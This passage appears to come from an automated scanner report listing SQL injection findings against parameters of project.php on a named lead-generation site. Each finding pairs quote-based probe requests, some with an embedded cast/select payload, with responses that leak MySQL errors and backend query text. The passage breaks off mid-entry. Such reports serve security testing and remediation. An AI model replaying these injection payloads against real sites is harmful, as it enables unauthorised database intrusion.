The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00'/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:36:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=immvv3t2bacib9rjmd321g3p66; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&iusrc=iupsc&address=cast((select chr(95)||chr(33)||chr(64)||chr(53' at line 5

Request 2

GET /ppc/leadflow/incn00''/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:36:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=937nduq4ujsf9f33r924iu5u46; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00''/project.php was not found on this server.</p>

1.396. http://www.insideup.com/ppc/leadflow/incn00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php'?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:36:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=esdtahjrcf1tiqg0hduksogjt2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&iusrc=iupsc&address=cast((select chr(95)||chr(33)||chr(64)||chr(53' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php''?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:36:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qc6ckv2n7qotocse2v9gmc67m5; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00/project.php'' was not found on this server.</p>

1.397. http://www.insideup.com/ppc/leadflow/incn00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hvpdsp4iaeijni5r57jiu0gto2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2976__Internet access&attributeId_459=2985__Yes - DSL&attributeId_460=2990__1' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=r2f5ipi10hjc7vosjvq3se21v7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.398. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1g5aasj5i0luk73v6jjkl591k7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2976__Internet access&attributeId_459=2985__Yes - DSL&attributeId_460=2990__1' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jmd8dnfmd01abucjveaiarij11; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.399. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fm399kce0267llhvh00snkpsk7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2976__Internet access&attributeId_459=2985__Yes - DSL&attributeId_460=2990__1' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ulf1unfkjbicmki6nee62ivm57; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.400. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=p2083j7aaeq8mt43bckf0166f7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2976__Internet access&attributeId_459=2985__Yes - DSL&attributeId_460=2990__1' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ce89v69m4neljpc20mitvipdn7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.401. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_458%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_458%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_458%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

